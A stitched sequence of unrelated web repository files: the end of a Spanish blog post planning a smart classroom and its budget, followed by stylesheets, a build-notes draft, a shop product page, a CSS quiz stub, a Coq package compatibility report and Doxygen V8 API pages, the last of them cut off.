<p>El diseño arquitectónico y la ergonomía del aula, poseer mobiliario e
instrumentos que faciliten el trabajo dentro del aula, la creatividad y colaboración.</p>
</li>
<li>
<p>La integración de la tecnología de manera: funcional, invisible, justificada e
intensiva</p>
</li>
<li>
<p>Una metodología didáctica: innovadora, disruptiva y oblicua; adecuada a este
espacio con la finalidad de hacer más eficiente y satisfactorio el proceso de
aprendizaje.</p>
</li>
</ol>
</div>
<div class="paragraph">
<p>Para poder considerarse una Smart classroom necesariamente deberá poseer ciertas
características didácticas como son:<br></p>
</div>
<div class="ulist">
<ul>
<li>
<p>Flexibilidad en la estructura física</p>
</li>
<li>
<p>Adaptabilidad</p>
</li>
<li>
<p>Confortabilidad</p>
</li>
<li>
<p>Riqueza y variabilidad</p>
</li>
<li>
<p>Conectividad</p>
</li>
<li>
<p>Personalización</p>
</li>
</ul>
</div>
<div class="paragraph">
<p>Por todo esto se ha planteado el siguiente plano de la clase en la que se pueden evidenciar los cambios que se necesitrarían.</p>
</div>
<div class="paragraph">
<p><span class="image center"><img src="https://dl.dropboxusercontent.com/u/82435380/Tutorias%20Marcelo/clase.jpg" alt="interaprendizaje" width="600"></span></p>
</div>
<div class="paragraph">
<p>De esta manera los cambios que se realizarán son los siguientes:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Aula cuenta con una PDI (Pizarra Digital Interactiva), de bajo costo, ya que se la realizo con el proyecto de Jonny Lee Chunlee,</p>
</li>
<li>
<p>Usar sistema operativos GNU/Linux Edubuntu, ya que posee gran cantidad de software educativo didáctivo.</p>
</li>
<li>
<p>Incorporar mesas para trabajo grupal</p>
</li>
<li>
<p>Agregar computadores, core I3 con sistema operativo Edubunto</p>
</li>
<li>
<p>Incorporar tablets</p>
</li>
<li>
<p>Generar un espacios que promuevan la creatividad y el trabajo colaborativo.</p>
</li>
</ul>
</div>
<div class="paragraph">
<p>Se ha planeado para realizar trabajado en grupos de 4 estudiantes, en el caso de ser más se podrán dar uso a puf ubicados alrededor, se cuenta con dos áreas bien limitadas, el área "académcia", donde se realizá en su mayoría el proceso de enseñana aprendizaje guiada por el docente/facilitador y el segundo "recreativo"donde se podrá continuar con este proceso de una manera menos formal y más libre.</p>
</div>
<div class="paragraph">
<p>Se ha generado estos espacios con el fin de que el estudiante logre identificar cada área y que logre trabajar de diferente manera en cada una, es decir, en el área "académica" se busca dirigir la atención a que el estudiante comprenda las directrices planteadas y/o conocimiento s necesarios para realizar las actividades.</p>
</div>
<div class="paragraph">
<p>Por otro lado en el área recreativa el estudiante podrá relajarse y sentirse libres el la convivencia con sus compañeros,interactuando y trabajando colaborativamente desde diversos puntos de esta área.</p>
</div>
<div class="paragraph">
<p>también se han ubicado áreas para la ubicación de materiales del estudiante (pertenencias) y otro de materiales del Aula (Librero, armario), así mismo se ha instalado una impresora inalámbrica para poder tener impreso o imprimir cualquier documentación que se necesite.</p>
</div>
<div class="paragraph">
<p>También se cuenta con una mesa principal que permitirá tener un espacio para trabajar entre todos, así cada estudiante podrá construir su conocimiento y aportar al del resto y esto facilitará la flexión, análisis y síntesis de toda la información/concimeinto y resolver infinidad de retos.</p>
</div>
<div class="paragraph">
<p>El docente/facilitador cuenta con su espacio ubicado de tal manera que le sea fácil dirigirse al grupo y verificar el desarrollo de las actividades o planificar las mismas. Una las de las carácterísitcas de todo el inmobiliario es que puede desplazarse con facilidad, ya que posee ruedas en cada pata.</p>
</div>
<div class="paragraph">
<p>Para visializar en 3D esta aula por favor visite este link:</p>
</div>
<div class="paragraph">
<p><a href="http://floorplanner.com/projects/37242114-smarthclassroom/#details" target="_blank">mapa 3D Smarth ClassRoom</a></p>
</div>
</div>
</div>
<div class="sect2">
<h3 id="__a_href_presupuesto_presupuesto_a"><a href="#presupuesto">Presupuesto</a></h3>
<div class="paragraph">
<p>Es necesario dar todo el uso posible al inmobiliario ya existe al igual que a la tecnología que posee ya el aula de clase por ello se propone:</p>
</div>
<table class="tableblock frame-all grid-all">
<caption class="title">Table 1. Tabla de presupuesto</caption>
<colgroup>
<col>
<col>
<col>
<col>
</colgroup>
<thead>
<tr>
<th class="tableblock halign-left valign-top">Cantidad</th>
<th class="tableblock halign-left valign-top">Descripción</th>
<th class="tableblock halign-left valign-top">Valor Individual</th>
<th class="tableblock halign-left valign-top">Valor Total</th>
</tr>
</thead>
<tfoot>
<tr>
<td class="tableblock halign-left valign-top"></td>
<td class="tableblock halign-left valign-top"></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">Total</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">3274</p></td>
</tr>
</tfoot>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">16</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">Sillas giratorias</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">20</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">320</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">4</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">Mesas para trabajo grupal 6 personas</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">70</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">280</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">5</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">Laptos Core I3</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">250</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">1250</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">5</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">Tablets</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">100</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">500</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">2</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">Sofas</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">130</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">260</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">8</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">Puf – cojines</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">15</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">120</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">1</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">Mesa grupal grande</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">130</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">130</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">1</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">Impresora multifunción (copiadora, escanner e impresota)</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">150</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">150</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">2</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">Alfombras</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">120</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">240</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">1</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">Dispensador de agua caliente/fria</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">24</p></td>
<td class="tableblock halign-left valign-top"><p class="tableblock">24</p></td>
</tr>
</tbody>
</table>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
Este valor de 3274 dólares es el cambio del euro (3000) a dolar.
</td>
</tr>
</table>
</div>
</div>
</div>
</div>
</section>
</article>
<section class="post-comments">
<div id="disqus_thread"></div>
<script type="text/javascript">
var disqus_shortname = 'marchelo2212'; // required: replace example with your forum shortname
/* * * DON'T EDIT BELOW THIS LINE * * */
(function() {
var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
})();
</script>
<noscript>Please enable JavaScript to view the <a href="http://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="http://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
</section>
<footer class="footer">
<span class="footer__copyright">© 2016. All rights reserved.</span>
<span class="footer__copyright"><a href="http://uno.daleanthony.com" title="link to page for Uno Ghost theme">Uno theme</a> by <a href="http://daleanthony.com" title="link to website for Dale-Anthony">Dale-Anthony</a></span>
<span class="footer__copyright">Proudly published with <a href="http://hubpress.io" title="link to Hubpress website">Hubpress</a></span>
</footer>
</div>
</div>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js?v="></script> <script src="//cdnjs.cloudflare.com/ajax/libs/moment.js/2.9.0/moment-with-locales.min.js?v="></script> <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/8.4/highlight.min.js?v="></script>
<script type="text/javascript">
jQuery( document ).ready(function() {
// change date with ago
jQuery('ago.ago').each(function(){
var element = jQuery(this).parent();
element.html( moment(element.text()).fromNow());
});
});
hljs.initHighlightingOnLoad();
</script>
<script type="text/javascript" src="//marchelo2212.github.io/themes/uno/assets/js/main.js?v=1.0.0"></script>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-70778105-1', 'auto');
ga('send', 'pageview');
</script>
</body>
</html>
|
mapApp/static/mapApp/css/barchart.css
|
SPARLab/BikeMaps
|
#barchart text {
fill: white;
font: 10px sans-serif;
text-anchor: start;
}
#barchart .axis text {
fill: black;
font: 10px sans-serif;
}
.axis path,
.axis line {
fill: none;
stroke: #000;
shape-rendering: crispEdges;
}
.x.axis path {
display: none;
}
|
_drafts/2012-11-05-building-cvblobs-and-cv-on-debian.html
|
jijames/cybercrimetech
|
---
layout: post
title: Building CVBlobs and CV on Debian
date: '2012-11-05T11:57:00.000+09:00'
author: Joshua James
tags:
modified_time: '2012-11-05T11:57:29.144+09:00'
blogger_id: tag:blogger.com,1999:blog-2701259639305045003.post-6958018771374003399
blogger_orig_url: http://www.cybercrimetech.com/2012/11/building-cvblobs-and-cv-on-debian.html
---
svn checkout http://cvblob.googlecode.com/svn/trunk/ cvblob-read-only<br /><br />cvblob<br /><br />cmake<br />libcv dev<br />libhighgui dev<br />libcvaux<br /><br />/usr/bin/ld: cannot find -lcv <br />/usr/bin/ld: cannot find -lhighgui<br />/usr/bin/ld: cannot find -lcvaux
|
_site/products/lamps/brown-lamp/index.html
|
mccl0140/ecommerce-website
|
<!DOCTYPE html>
<html lang="en-ca">
<head>
<meta charset="utf-8">
<title>Urban Adornments</title>
<link href="/images/favicon.ico" rel="shortcut icon">
<meta name="description" content="A beautiful neutral/brown lamp.">
<meta name="handheldfriendly" content="true">
<meta name="mobileoptimized" content="240">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href='http://fonts.googleapis.com/css?family=Alex+Brush' rel='stylesheet' type='text/css'>
<link href="/css/urban-adornments.css" rel="stylesheet">
</head>
<body>
<header class="masthead island push-0" role="banner">
<div class="grid grid-bottom">
<div class="unit unit-s-1 unit-m-1 unit-l-1-3">
<h1 class="push-0"><img class="img-flex logo" src="/images/logo.svg" alt="Urban Adornments"></h1>
</div>
<nav class="unit unit-s-1 unit-m-1 unit-l-2-3" role="navigation">
<ul class="list-group giga brand-family push-0 nav">
<li class="list-group-item list-group-item-inline">
<a class="" href="/">Home</a>
</li>
<li class="list-group-item list-group-item-inline">
<a class="current"href="/products/">Products</a>
</li>
<li class="list-group-item list-group-item-inline">
<a class="" href="/about/">About</a>
</li>
</ul>
<div class="search-bar">
<form action="/search" class="search-wrapper cf" role="search">
<input type="text" placeholder="Search here..." required="">
<button type="submit">Search</button>
</form>
</div>
</nav>
</div>
</header>
<a href="/products"><h1 class="yotta">Products</h1></a>
<div class="grid">
<div class="unit-s-1 unit-m-1 unit-l-1-4">
<h1 class="push-0">Brown Lamp</h1>
<img class="img-flex" src="/images/lamps/brown-lamp.svg" alt="Photo ofBrown Lamp">
</div>
<div class="giga push-0 unit-s-1 unit-m-1 unit-l-1-2">
<dl>
<dt>Price</dt>
<dd>$20.00</dd>
<dt>Info</dt>
<dd>A beautiful neutral/brown lamp.</dd>
<a class="btn" href="/cart">Add to Cart!</a>
</dl>
</div>
</div>
<footer class="footer pad-t">
<div class="grid">
<div class="unit unit-s-1 unit-m-1 unit-l-1-2 gutter-1-2" role="contentinfo">
<p class="footer-copyright"><small>© 2014 Urban Adornments</small></p>
</div>
<div class="unit unit-s-1 unit-m-1 unit-l-1-2 gutter-1-2">
<ul class="list-group footer-links">
<li class="list-group-item list-group-item-inline">
<a href="#" class="icon-link icon i-16 i-facebook ir">Facebook</a>
</li>
<li class="list-group-item list-group-item-inline">
<a href="#" class="icon-link icon i-16 i-twitter ir">Twitter</a>
</li>
<li class="list-group-item list-group-item-inline">
<a href="#" class="icon-link icon i-16 i-googleplus ir">Google+</a>
</li>
<li class="list-group-item list-group-item-inline">
<a href="#" class="icon-link icon i-16 i-pinterest ir">Pinterest</a>
</li>
</ul>
</div>
</div>
</footer>
</body>
</html>
|
main/lock_api/mutex/trait.RawMutex.html
|
malept/guardhaus
|
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="refresh" content="0;URL=../../lock_api/trait.RawMutex.html">
</head>
<body>
<p>Redirecting to <a href="../../lock_api/trait.RawMutex.html">../../lock_api/trait.RawMutex.html</a>...</p>
<script>location.replace("../../lock_api/trait.RawMutex.html" + location.search + location.hash);</script>
</body>
</html>
|
assets/css/common.css
|
sambysam/sambysam.github.io
|
#logo {
position: absolute;
left: 50%;
margin-left: -150px;
display: block;
width: 300px;
z-index: 99;
-webkit-transition: all 0.5s ease 1s;
-moz-transition: all 0.5s ease 1s;
-o-transition: all 0.5s ease 1s;
transition: all 0.5s ease 1s;
}
#logo img {
max-width: 100%;
}
#logo.shift {
left: 10px;
margin-left: 0;
width: 200px;
}
/*=====================================
NAVBAR STYLES
===================================*/
.logo-custom {
max-height: 30px
}
.italic {
font-style: italic;
}
#menu {
height: 90px;
background-color: rgba(0, 0, 0, 0.3);
background: url(../img/silkscreen.svg), rgba(0, 0, 0, 0.3);
background-position: top center;
background-size: 4px 4px, 100%;
background-repeat: repeat, no-repeat;
color: #fff;
font-size: 12px;
font-weight: 900;
letter-spacing: 1px;
-webkit-transition: all 0.5s ease 1s;
-moz-transition: all 0.5s ease 1s;
-o-transition: all 0.5s ease 1s;
transition: all 0.5s ease 1s;
}
#menu.shrink {
height: 60px;
background: #000;
}
#menu h1 {
opacity: 0;
color: #fff;
text-shadow: none;
font-size: 26px;
margin: 0;
position: absolute;
left: 220px;
top: 15px;
-webkit-transition: all 0.5s ease 1s;
-moz-transition: all 0.5s ease 1s;
-o-transition: all 0.5s ease 1s;
transition: all 0.5s ease 1s;
}
#menu.shrink h1 {
opacity: 1;
}
.navbar-inverse {
background: #ff0000;
border-color: transparent;
}
.navbar-inverse .navbar-nav > li > a,
.navbar-inverse .navbar-nav > li > a:hover {
color: #FFF;
}
/*=====================================
FOOTER STYLES
===================================*/
.myfooter {
background-color: #000;
padding: 5px 40px 5px 40px;
color: #fff;
font-size: 14px;
text-align: right;
}
.social {
float: left;
list-style: none;
margin: 0;
padding: 0;
}
.social li {
display: inline-block;
}
.social .fb-share-button {
float: left;
}
@media screen and (max-width: 767px) {
#logo.shift {
width: 160px;
}
#menu.shrink {
height: 50px;
}
#menu.shrink h1 {
left: 175px;
font-size: 20px;
}
h1 {
font-size: 46px;
}
}
@media screen and (max-width: 500px) {
#menu.shrink h1 {
left: 175px;
font-size: 18px;
top: 7px;
}
}
|
effect-effector/index.html
|
acgd-learn-the-web/activities
|
---
title: "Effect Effector"
desc: "A quick multiple choice quiz testing knowledge of CSS effects like animations and transitions."
intro: "Effects that affect"
congrats: "The effect of the effect’s affect affected all effects."
styles:
- /common/prism.min.css
scripts:
- /common/prism.min.js
- activity.js
layout: multiple-choice
---
<div id="question-7" hidden>
<pre><code class="language-css">{% capture code %}.dino {
animation: dino-hop 1s 2s 3 ease;
}
{% endcapture %}{{ code | escape }}</code></pre>
</div>
<div id="question-8" hidden>
<video class="w-100 push" controls muted loop preload="metadata" playsinline>
<source src="https://assets.learn-the-web.algonquindesign.ca/activities/effect-effector/transition-or-animation-1.mp4" type="video/mp4">
</video>
</div>
<div id="question-9" hidden>
<video class="w-100 push" controls muted loop preload="metadata" playsinline>
<source src="https://assets.learn-the-web.algonquindesign.ca/activities/effect-effector/transition-or-animation-2.mp4" type="video/mp4">
</video>
</div>
<div id="question-10" hidden>
<video class="w-100 push" controls muted loop preload="metadata" playsinline>
<source src="https://assets.learn-the-web.algonquindesign.ca/activities/effect-effector/transition-or-animation-3.mp4" type="video/mp4">
</video>
</div>
|
clean/Linux-x86_64-4.08.1-2.0.5/released/8.13.1/monae/0.0.1.html
|
coq-bench/coq-bench.github.io
|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>monae: Not compatible 👼</title>
<link rel="shortcut icon" type="image/png" href="../../../../../favicon.png" />
<link href="../../../../../bootstrap.min.css" rel="stylesheet">
<link href="../../../../../bootstrap-custom.css" rel="stylesheet">
<link href="//maxcdn.bootstrapcdn.com/font-awesome/4.2.0/css/font-awesome.min.css" rel="stylesheet">
<script src="../../../../../moment.min.js"></script>
<!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
<script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
<![endif]-->
</head>
<body>
<div class="container">
<div class="navbar navbar-default" role="navigation">
<div class="container-fluid">
<div class="navbar-header">
<a class="navbar-brand" href="../../../../.."><i class="fa fa-lg fa-flag-checkered"></i> Coq bench</a>
</div>
<div id="navbar" class="collapse navbar-collapse">
<ul class="nav navbar-nav">
<li><a href="../..">clean / released</a></li>
<li class="active"><a href="">8.13.1 / monae - 0.0.1</a></li>
</ul>
</div>
</div>
</div>
<div class="article">
<div class="row">
<div class="col-md-12">
<a href="../..">« Up</a>
<h1>
monae
<small>
0.0.1
<span class="label label-info">Not compatible 👼</span>
</small>
</h1>
<p>📅 <em><script>document.write(moment("2021-10-26 18:01:49 +0000", "YYYY-MM-DD HH:mm:ss Z").fromNow());</script> (2021-10-26 18:01:49 UTC)</em><p>
<h2>Context</h2>
<pre># Packages matching: installed
# Name # Installed # Synopsis
base-bigarray base
base-threads base
base-unix base
conf-findutils 1 Virtual package relying on findutils
conf-gmp 3 Virtual package relying on a GMP lib system installation
coq 8.13.1 Formal proof management system
num 1.4 The legacy Num library for arbitrary-precision integer and rational arithmetic
ocaml 4.08.1 The OCaml compiler (virtual package)
ocaml-base-compiler 4.08.1 Official release 4.08.1
ocaml-config 1 OCaml Switch Configuration
ocamlfind 1.9.1 A library manager for OCaml
zarith 1.12 Implements arithmetic and logical operations over arbitrary-precision integers
# opam file:
opam-version: "2.0"
name: "coq-monae"
maintainer: "reynald.affeldt@aist.go.jp"
homepage: "https://github.com/affeldt-aist/monae"
bug-reports: "https://github.com/affeldt-aist/monae/issues"
dev-repo: "git+https://github.com/affeldt-aist/monae.git"
license: "GPLv3"
authors: [
"Reynald Affeldt"
"David Nowak"
"Takafumi Saikawa"
]
build: [
["coq_makefile" "-f" "_CoqProject" "-o" "Makefile"]
[make]
]
install: [
[make "install"]
]
depends: [
"coq" { (>= "8.9.1" & < "8.10.0~") }
"coq-infotheo" { (>= "0.0.1" & < "0.0.4") }
]
synopsis: "Monae"
description: """
This repository contains a formalization of monads including several
models, examples of monadic equational reasoning, and an application
to program semantics.
"""
url {
http: "https://github.com/affeldt-aist/monae/archive/0.0.1.tar.gz"
checksum: "md5=098f07dde98231f5068b9d0b09670dc3"
}
</pre>
<h2>Lint</h2>
<dl class="dl-horizontal">
<dt>Command</dt>
<dd><code>true</code></dd>
<dt>Return code</dt>
<dd>0</dd>
</dl>
<h2>Dry install 🏜️</h2>
<p>Dry install with the current Coq version:</p>
<dl class="dl-horizontal">
<dt>Command</dt>
<dd><code>opam install -y --show-action coq-monae.0.0.1 coq.8.13.1</code></dd>
<dt>Return code</dt>
<dd>5120</dd>
<dt>Output</dt>
<dd><pre>[NOTE] Package coq is already installed (current version is 8.13.1).
The following dependencies couldn't be met:
- coq-monae -> coq < 8.10.0~ -> ocaml < 4.06.0
base of this switch (use `--unlock-base' to force)
Your request can't be satisfied:
- No available version of coq satisfies the constraints
No solution found, exiting
</pre></dd>
</dl>
<p>Dry install without Coq/switch base, to test if the problem was incompatibility with the current Coq/OCaml version:</p>
<dl class="dl-horizontal">
<dt>Command</dt>
<dd><code>opam remove -y coq; opam install -y --show-action --unlock-base coq-monae.0.0.1</code></dd>
<dt>Return code</dt>
<dd>0</dd>
</dl>
<h2>Install dependencies</h2>
<dl class="dl-horizontal">
<dt>Command</dt>
<dd><code>true</code></dd>
<dt>Return code</dt>
<dd>0</dd>
<dt>Duration</dt>
<dd>0 s</dd>
</dl>
<h2>Install 🚀</h2>
<dl class="dl-horizontal">
<dt>Command</dt>
<dd><code>true</code></dd>
<dt>Return code</dt>
<dd>0</dd>
<dt>Duration</dt>
<dd>0 s</dd>
</dl>
<h2>Installation size</h2>
<p>No files were installed.</p>
<h2>Uninstall 🧹</h2>
<dl class="dl-horizontal">
<dt>Command</dt>
<dd><code>true</code></dd>
<dt>Return code</dt>
<dd>0</dd>
<dt>Missing removes</dt>
<dd>
none
</dd>
<dt>Wrong removes</dt>
<dd>
none
</dd>
</dl>
</div>
</div>
</div>
<hr/>
<div class="footer">
<p class="text-center">
Sources are on <a href="https://github.com/coq-bench">GitHub</a> © Guillaume Claret 🐣
</p>
</div>
</div>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
<script src="../../../../../bootstrap.min.js"></script>
</body>
</html>
|
e5db01e/html/classv8_1_1_string_1_1_value-members.html
|
v8-dox/v8-dox.github.io
|
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.9.1"/>
<title>V8 API Reference Guide for node.js v0.7.3: Member List</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/searchdata.js"></script>
<script type="text/javascript" src="search/search.js"></script>
<script type="text/javascript">
$(document).ready(function() { init_search(); });
</script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td style="padding-left: 0.5em;">
<div id="projectname">V8 API Reference Guide for node.js v0.7.3
</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.9.1 -->
<script type="text/javascript">
var searchBox = new SearchBox("searchBox", "search",false,'Search');
</script>
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Main Page</span></a></li>
<li><a href="namespaces.html"><span>Namespaces</span></a></li>
<li class="current"><a href="annotated.html"><span>Classes</span></a></li>
<li><a href="files.html"><span>Files</span></a></li>
<li><a href="examples.html"><span>Examples</span></a></li>
<li>
<div id="MSearchBox" class="MSearchBoxInactive">
<span class="left">
<img id="MSearchSelect" src="search/mag_sel.png"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
alt=""/>
<input type="text" id="MSearchField" value="Search" accesskey="S"
onfocus="searchBox.OnSearchFieldFocus(true)"
onblur="searchBox.OnSearchFieldFocus(false)"
onkeyup="searchBox.OnSearchFieldChange(event)"/>
</span><span class="right">
<a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a>
</span>
</div>
</li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="annotated.html"><span>Class List</span></a></li>
<li><a href="classes.html"><span>Class Index</span></a></li>
<li><a href="hierarchy.html"><span>Class Hierarchy</span></a></li>
<li><a href="functions.html"><span>Class Members</span></a></li>
</ul>
</div>
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
onkeydown="return searchBox.OnSearchSelectKey(event)">
</div>
<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0"
name="MSearchResults" id="MSearchResults">
</iframe>
</div>
<div id="nav-path" class="navpath">
<ul>
<li class="navelem"><a class="el" href="namespacev8.html">v8</a></li><li class="navelem"><a class="el" href="classv8_1_1_string.html">String</a></li><li class="navelem"><a class="el" href="classv8_1_1_string_1_1_value.html">Value</a></li> </ul>
</div>
</div><!-- top -->
<div class="header">
<div class="headertitle">
<div class="title">v8::String::Value Member List</div> </div>
</div><!--header-->
<div class="contents">
<p>This is the complete list of members for <a class="el" href="classv8_1_1_string_1_1_value.html">v8::String::Value</a>, including all inherited members.</p>
<table class="directory">
<tr bgcolor="#f0f0f0" class="even"><td class="entry"><b>length</b>() const (defined in <a class="el" href="classv8_1_1_string_1_1_value.html">v8::String::Value</a>)</td><td class="entry"><a class="el" href="classv8_1_1_string_1_1_value.html">v8::String::Value</a></td><td class="entry"><span class="mlabel">inline</span></td></tr>
<tr bgcolor="#f0f0f0"><td class="entry"><b>operator*</b>() (defined in <a class="el" href="classv8_1_1_string_1_1_value.html">v8::String::Value</a>)</td><td class="entry"><a class="el" href="classv8_1_1_string_1_1_value.html">v8::String::Value</a></td><td class="entry"><span class="mlabel">inline</span></td></tr>
<tr bgcolor="#f0f0f0" class="even"><td class="entry"><b>operator*</b>() const (defined in <a class="el" href="classv8_1_1_string_1_1_value.html">v8::String::Value</a>)</td><td class="entry"><a class="el" href="classv8_1_1_string_1_1_value.html">v8::String::Value</a></td><td class="entry"><span class="mlabel">inline</span></td></tr>
<tr bgcolor="#f0f0f0"><td class="entry"><b>Value</b>(Handle< v8::Value > obj) (defined in <a class="el" href="classv8_1_1_string_1_1_value.html">v8::String::Value</a>)</td><td class="entry"><a class="el" href="classv8_1_1_string_1_1_value.html">v8::String::Value</a></td><td class="entry"><span class="mlabel">explicit</span></td></tr>
<tr bgcolor="#f0f0f0" class="even"><td class="entry"><b>~Value</b>() (defined in <a class="el" href="classv8_1_1_string_1_1_value.html">v8::String::Value</a>)</td><td class="entry"><a class="el" href="classv8_1_1_string_1_1_value.html">v8::String::Value</a></td><td class="entry"></td></tr>
</table></div><!-- contents -->
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated on Tue Aug 11 2015 23:48:05 for V8 API Reference Guide for node.js v0.7.3 by  <a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.9.1
</small></address>
</body>
</html>
|
4e1a50a/html/classv8_1_1IdleTask.html
|
v8-dox/v8-dox.github.io
|
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.11"/>
<title>V8 API Reference Guide for node.js v6.11.4: v8::IdleTask Class Reference</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/searchdata.js"></script>
<script type="text/javascript" src="search/search.js"></script>
<script type="text/javascript">
$(document).ready(function() { init_search(); });
</script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td id="projectalign" style="padding-left: 0.5em;">
<div id="projectname">V8 API Reference Guide for node.js v6.11.4
</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.11 -->
<script type="text/javascript">
var searchBox = new SearchBox("searchBox", "search",false,'Search');
</script>
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Main Page</span></a></li>
<li><a href="namespaces.html"><span>Namespaces</span></a></li>
